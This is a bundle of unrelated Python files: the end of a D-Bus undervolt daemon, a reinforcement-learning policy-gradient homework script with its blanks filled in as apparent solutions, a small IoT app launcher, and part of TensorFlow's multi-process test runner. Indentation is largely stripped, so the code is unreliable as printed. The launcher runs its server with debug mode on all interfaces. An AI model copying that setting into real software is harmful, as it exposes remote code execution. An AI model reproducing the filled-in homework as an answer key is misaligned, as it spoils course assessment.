bus = dbus.SystemBus()
# add dbus receiver only if undervolt/IccMax is enabled in config
if any(
config.getfloat(key, plane, fallback=0) != 0 for plane in VOLTAGE_PLANES for key in UNDERVOLT_KEYS + ICCMAX_KEYS
):
bus.add_signal_receiver(
handle_sleep_callback, 'PrepareForSleep', 'org.freedesktop.login1.Manager', 'org.freedesktop.login1'
)
bus.add_signal_receiver(
handle_ac_callback,
signal_name="PropertiesChanged",
dbus_interface="org.freedesktop.DBus.Properties",
path="/org/freedesktop/UPower/devices/line_power_AC",
)
log('[I] Starting main loop.')
if args.monitor is not None:
monitor_thread = Thread(target=monitor, args=(exit_event, args.monitor))
monitor_thread.daemon = True
monitor_thread.start()
try:
loop = GLib.MainLoop()
loop.run()
except (KeyboardInterrupt, SystemExit):
pass
exit_event.set()
loop.quit()
thread.join(timeout=1)
if args.monitor is not None:
monitor_thread.join(timeout=0.1)
if __name__ == '__main__':
main()
|
train_pg.py | import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
# YOUR_CODE_HERE
out = input_placeholder
for l in range(n_layers):
            out = tf.layers.dense(inputs=out, units=size, activation=activation)
        out = tf.layers.dense(inputs=out, units=output_size, activation=output_activation)
return out
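# Example: build_mlp(sy_ob_no, ac_dim, "policy", n_layers=2, size=64) builds a
# 2-hidden-layer tanh MLP whose output layer has one unit per action dimension.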
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
        # One possible implementation (a sketch; names follow the hints above):
        sy_logits_na = build_mlp(sy_ob_no, ac_dim, "policy", n_layers=n_layers, size=size)
        sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=[1])  # Hint: Use the tf.multinomial op
        # sparse softmax cross-entropy returns -log pi(a|s), so negate it
        sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
# YOUR_CODE_HERE
        # One possible implementation (a sketch):
        sy_mean = build_mlp(sy_ob_no, ac_dim, "policy", n_layers=n_layers, size=size)
        sy_logstd = tf.get_variable("logstd", shape=[ac_dim], dtype=tf.float32)  # logstd should just be a trainable variable, not a network output.
        sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))  # reparameterization trick
        # log probability under a diagonal multivariate gaussian (the constant log(2*pi) term is dropped)
        sy_logprob_n = -0.5 * tf.reduce_sum(tf.square((sy_ac_na - sy_mean) / tf.exp(sy_logstd)), axis=1) - tf.reduce_sum(sy_logstd)
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
    # One possible implementation: negate so that minimizing the loss maximizes expected return.
    loss = -tf.reduce_mean(sy_logprob_n * sy_adv_n)  # Loss function that we'll differentiate to get the policy gradient.
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
        # One possible implementation: fit the baseline to normalized targets (see Hint #bl2).
        sy_target_n = tf.placeholder(shape=[None], name="baseline_target", dtype=tf.float32)
        baseline_loss = tf.losses.mean_squared_error(labels=sy_target_n, predictions=baseline_prediction)
        baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(baseline_loss)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
        # One possible implementation covering both cases described above:
        q_n = []
        for path in paths:
            rewards = path["reward"]
            if reward_to_go:
                # Case 2: Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}, computed right-to-left
                q = np.zeros_like(rewards, dtype=np.float64)
                running = 0.0
                for t in reversed(range(len(rewards))):
                    running = rewards[t] + gamma * running
                    q[t] = running
            else:
                # Case 1: Q_t = Ret(tau) = sum_{t'=0}^T gamma^t' * r_{t'} for every t
                ret = sum((gamma ** t) * r for t, r in enumerate(rewards))
                q = np.full(len(rewards), ret)
            q_n.append(q)
        q_n = np.concatenate(q_n)
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
            b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no: ob_no})
            # rescale to match the statistics of the current batch of Q-values (Hint #bl1)
            b_n = b_n * (q_n.std() + 1e-8) + q_n.mean()
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
            adv_n = (adv_n - adv_n.mean()) / (adv_n.std() + 1e-8)
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
            # One possible implementation: normalize the targets (Hint #bl2) and fit.
            target_n = (q_n - q_n.mean()) / (q_n.std() + 1e-8)
            sess.run(baseline_update_op, feed_dict={sy_ob_no: ob_no, sy_target_n: target_n})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
        # YOUR_CODE_HERE (one possible implementation)
        feed = {sy_ob_no: ob_no, sy_ac_na: ac_na, sy_adv_n: adv_n}
        loss_before = sess.run(loss, feed_dict=feed)  # saved for debugging
        sess.run(update_op, feed_dict=feed)
        loss_after = sess.run(loss, feed_dict=feed)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
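# Hedged usage sketch (flags taken from the parser above; the environment and
# experiment names below are illustrative, not prescribed):
#   python train_pg.py CartPole-v0 -n 100 -b 1000 -rtg --exp_name vpg_rtg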
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward, hacky use of a separate process per run, because TensorFlow does
# not like train_PG being called repeatedly in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
main.py | #########################################################################
# The MIT License (MIT) #
# Copyright (c) 2016 Patrick Lai, Josh Manogaran, #
# Brendan Srinivasalu, Elias Tadros #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be #
# included in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, #
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF #
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.#
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY #
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF #
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION #
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
#########################################################################
# Standard Libraries from Python Software Foundation
from multiprocessing import Process
import Queue
import time
# Own modules
from route import *
from database import *
from comms import *
def main():
page = {'title' : 'IOT Trash Can'}
datalistener = Process(target=jsonListener, args=()) # Background JSON listener process
datalistener.start() # Start the listener
app.run(host='0.0.0.0', port=8080, debug=True) # Blocks until the server stops
datalistener.join() # Then wait for the listener to finish
if __name__ == "__main__":
main()
|
multi_process_runner.py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When the is_successful
# attribute is True, the subprocess ended successfully; when it is False, the
# exception stack trace info is stored in exc_info to be passed on to the parent
# process and re-raised.
_ProcessStatusInfo = collections.namedtuple(
'_ProcessStatusInfo',
['task_type', 'task_id', 'is_successful', 'exc_info', 'return_value'])
# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
['return_value', 'stdout'])
TestEnvironment = collections.namedtuple('TestEnvironment', [
'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
'v2_enabled', 'executing_eagerly'
])
# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])
# The default timeout (in seconds) is chosen so that it triggers before the
# default "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200
# The timeout in seconds to wait to force kill a child process. When a child
# process times out we first try to SIGTERM it so that it has a chance to dump
# stacktraces. However dumping stacktrace can take a long time.
_FORCE_KILL_WAIT_SEC = 30
class MultiProcessRunner(object):
"""A utility class to start multiple processes to simulate a cluster.
We need to use multiple processes to simulate a cluster in TF 2.0 tests
because TF 2.0 has some process-global data structures that have to be
separated by processes. We also need child processes to test out our fault
tolerance because shutting down a standard TensorFlow server within its
process is not supported.
Note: the main test program that uses this runner class must run its main
program via `test_main` defined in this file. Using this runner in non-test
binaries is not supported yet.
This class is not thread-safe. Child processes will inherit the TF2 behavior
flag.
"""
def __init__(self,
proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
use_dill_for_args=True,
daemon=False,
dependence_on_chief=True,
auto_restart=False,
args=None,
kwargs=None):
"""Creates a multi-process runner.
Args:
proc_func: Function to be run on child processes. This will be run on
processes for all task types.
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers and two ps's.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"],
"ps": ["ps0.example.com:2222",
"ps1.example.com:2222"]}
rpc_layer: RPC layer to use. Default value is 'grpc'.
max_run_time: If set, child processes are forced to exit at approximately
this many seconds after `start` is called. We achieve this through the
`signal.alarm()` API. Note that this is best effort at the Python level,
since Python signal handlers do not get executed while lower-level
C/C++ code is running, so it can be delayed for an arbitrarily long time.
If any of the child processes are still running when `max_run_time` is up,
they will be force-terminated and an `UnexpectedSubprocessExitError`
may be raised at `join()`.
grpc_fail_fast: Whether GRPC connection between processes should fail
without retrying. Defaults to None, in which case the environment
variable is not explicitly set.
stream_stdout: True if the output/error from the subprocesses should be
streamed and printed in the parent process's log. Defaults to True.
list_stdout: True if the output/error from the subprocesses should be
collected to be attached to the resulting `MultiProcessRunnerResult`
returned from `MultiProcessRunner.join()`. If True, the list of stdout
can be retrieved via `MultiProcessRunnerResult.stdout` attribute.
Defaults to False.
use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
can pickle more objects, but doesn't work with types in
`multiprocessing` library like `Mutex`.
daemon: Whether to start processes as daemons.
dependence_on_chief: Whether to terminate the cluster when the chief exits.
If auto_restart is True, it only terminates the cluster if the chief
exits with a zero exit code.
auto_restart: Whether to automatically restart processes that exit with
non-zero exit code.
args: Positional arguments to be sent to functions run on processes.
kwargs: Keyword arguments to be sent to functions run on processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
assert cluster_spec is not None
if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
raise ValueError('If chief exists in the cluster, there must be at most '
'one chief. Current `cluster_spec` has {} chiefs.'
.format(len(cluster_spec['chief'])))
if not multi_process_lib.initialized():
raise RuntimeError('`multi_process_runner` is not initialized. '
'Please call `multi_process_runner.test_main()` '
'within `if __name__ == \'__main__\':` block '
'in your python module to properly initialize '
'`multi_process_runner`.')
if not callable(proc_func):
raise ValueError('proc_func is not a callable')
self._proc_func = proc_func
self._cluster_spec = cluster_spec
self._rpc_layer = rpc_layer or 'grpc'
self._max_run_time = max_run_time
self._grpc_fail_fast = grpc_fail_fast
self._stream_stdout = stream_stdout
# TODO(rchao): Revisit list_stdout argument to consider other solution.
self._list_stdout = list_stdout
self._dependence_on_chief = dependence_on_chief
self._use_dill_for_args = use_dill_for_args
self._daemon = daemon
self._auto_restart = auto_restart
self._args = args or ()
self._kwargs = kwargs or {}
# Child processes should have the same v2 and eager behavior.
self._v2_enabled = tf2.enabled()
self._executing_eagerly = context.executing_eagerly()
self._joined = False
self._process_lock = threading.Lock()
# Guarded by self._process_lock.
self._processes = {}
# Record which processes are terminated. Due to a bug in Python<3.7,
# terminated processes return 255 exit code, which should cause an exception
# in join().
# https://bugs.python.org/issue30589
# Guarded by self._process_lock.
self._terminated = set()
self._reading_threads = []
self._manager = manager()
self._process_status_queue = self._manager.Queue()
self._parent_to_sub_queue = self._manager.Queue()
parties = sum(len(addresses) for addresses in self._cluster_spec.values())
self._barrier = self._manager.Barrier(parties)
# We use a queue to collect outputs from worker processes since it's thread
# safe.
self._streaming_queue = self._manager.Queue()
self._watchdog_thread = None
def set_args(self, args=None, kwargs=None):
self._args = args or self._args
self._kwargs = kwargs or self._kwargs
def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
"""Function to continuously read lines from subprocesses."""
with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
for line in reader:
task_string = '[{}-{}]:'.format(task_type, task_id)
formatted_line = '{} {}'.format(task_string.ljust(14), line)
if self._stream_stdout:
# TODO(rchao): Use a lock here to ensure the printed lines are not
# broken.
print(formatted_line, end='', flush=True)
if self._list_stdout:
self._streaming_queue.put(formatted_line)
def _start_subprocess_and_reading_thread(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Start a subprocess and a thread the reads lines from the subprocess."""
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
test_env = TestEnvironment(
task_type=task_type,
task_id=task_id,
cluster_spec=cluster_spec or self._cluster_spec,
rpc_layer=self._rpc_layer,
grpc_fail_fast=self._grpc_fail_fast,
v2_enabled=self._v2_enabled,
executing_eagerly=self._executing_eagerly,
)
pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
resources = Resources(
process_status_queue=self._process_status_queue,
parent_to_sub_queue=self._parent_to_sub_queue,
streaming_pipe_w=pipe_w,
barrier=self._barrier,
)
if proc_func is None:
proc_func, args, kwargs = self._proc_func, self._args, self._kwargs
# Always use dill to pickle proc_func so that we support more callable
# types, e.g. lambda.
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
if self._use_dill_for_args:
args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)
p = _Process(
test_env=test_env,
target=_ProcFunc(),
args=(resources, test_env, proc_func, args, kwargs,
self._use_dill_for_args),
daemon=self._daemon)
p.start()
self._processes[(task_type, task_id)] = p
self._terminated.discard((task_type, task_id))
# For each subprocess, we dedicate a thread continuously reading lines
# from them.
thread = threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._continuously_readline_from_sub,
args=(pipe_r, task_type, task_id))
thread.start()
self._reading_threads.append(thread)
if self._watchdog_thread is None or not self._watchdog_thread.is_alive():
self._watchdog_thread = threading.Thread(target=self._process_watchdog)
self._watchdog_thread.start()
def start(self):
"""Starts processes, one for each task in `cluster_spec`.
Note that this is best effort by the applicable multiprocessing library,
and it may take several seconds for a subprocess to be successfully started.
"""
with self._process_lock:
if self._processes:
raise ValueError('MultiProcessRunner already started.')
if self._joined:
raise ValueError('cannot start new processes after '
                 'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
self._start_subprocess_and_reading_thread(task_type, task_id)
# TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
# without this the tests become very flaky.
if self._max_run_time is not None:
def handler(signum, frame):
del signum, frame
self.terminate_all()
signal.signal(signal.SIGALRM, handler)
signal.alarm(self._max_run_time)
def start_in_process_as(self, as_task_type, as_task_id):
"""Start the processes, with the specified task run in main process.
This is similar to `start()` except that the task with task_type
`as_task_type` and task_id `as_task_id` is run in the main process.
This method is particularly useful when a debugging tool such as `pdb` is
needed in some specific task. Note that since this method blocks until
that specific task exits, any follow-up actions need to run in a separate
thread:
```python
def proc_func():
# user code to be run
import pdb; pdb.set_trace()
def follow_ups():
time.sleep(5)
mpr.start_single_process(
task_type='evaluator',
task_id=0)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
threading.Thread(target=follow_ups).start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
mpr.join()
```
Note that if `list_stdout=True`, the logs/stdout of the task
run by the main process are not available in result.stdout.
Args:
as_task_type: The task type to be run in the main process.
as_task_id: The task id to be run in the main process.
"""
if self._processes:
raise ValueError('MultiProcessRunner already started.')
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after '
                 'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
if not (task_type == as_task_type and task_id == as_task_id):
self._start_subprocess_and_reading_thread(task_type, task_id)
_set_tf_config(as_task_type, as_task_id, self._cluster_spec,
self._rpc_layer)
self._proc_func(*self._args, **self._kwargs)
def start_single_process(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Starts a single process.
This starts a process in the cluster with the task type, task id, and the
process function (`proc_func`). If process function is `None`, the function
provided at `__init__` will be used. If `cluster_spec` is `None`, the
cluster spec provided at `__init__` will be used.
TODO(rchao): It is meant that all subprocesses will be updated with the new
cluster spec, but this has yet to be implemented. At this time only the
newly started subprocess picks up this updated cluster spec.
Args:
task_type: The task type.
task_id: The task id.
cluster_spec: The cluster spec to be used on the newly started
process. If `None`, the cluster spec provided at `__init__` will be
used.
proc_func: The process function to be run on the newly started
process. If specified, specify `args` and `kwargs` as well. If `None`,
the function provided at `__init__` will be used.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
"""
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after '
                 'MultiProcessRunner.join() is called')
self._start_subprocess_and_reading_thread(
task_type,
task_id,
cluster_spec=cluster_spec,
proc_func=proc_func,
args=args or (),
kwargs=kwargs or {})
def _queue_to_list(self, queue_to_convert):
"""Convert `queue.Queue` to `list`."""
list_to_return = []
# Calling `queue.empty()` is not reliable (it can race with concurrent puts),
# so drain until `Queue.Empty` is raised instead.
while True:
try:
list_to_return.append(queue_to_convert.get(block=False))
except Queue.Empty:
break
return list_to_return
def _get_process_statuses(self):
# One worker may have multiple statuses. We only keep the last one.
statuses = {}
for status in self._queue_to_list(self._process_status_queue):
statuses[(status.task_type, status.task_id)] = status
return statuses
def get_process_id(self, task_type, task_id):
"""Returns the subprocess id given the task type and task id."""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
return p.pid if p else None
def get_process_exit_code(self, task_type, task_id):
"""Returns the subprocess exit code given the task type and task id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
The subprocess exit code; `None` if the subprocess has not exited yet.
Raises:
KeyError: If the corresponding subprocess is not found with `task_type`
and `task_id`.
"""
with self._process_lock:
p = self._processes[(task_type, task_id)]
return p.exitcode if p else None
def process_exists(self, task_type, task_id):
"""Returns whether the subprocess still exists given the task type and id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
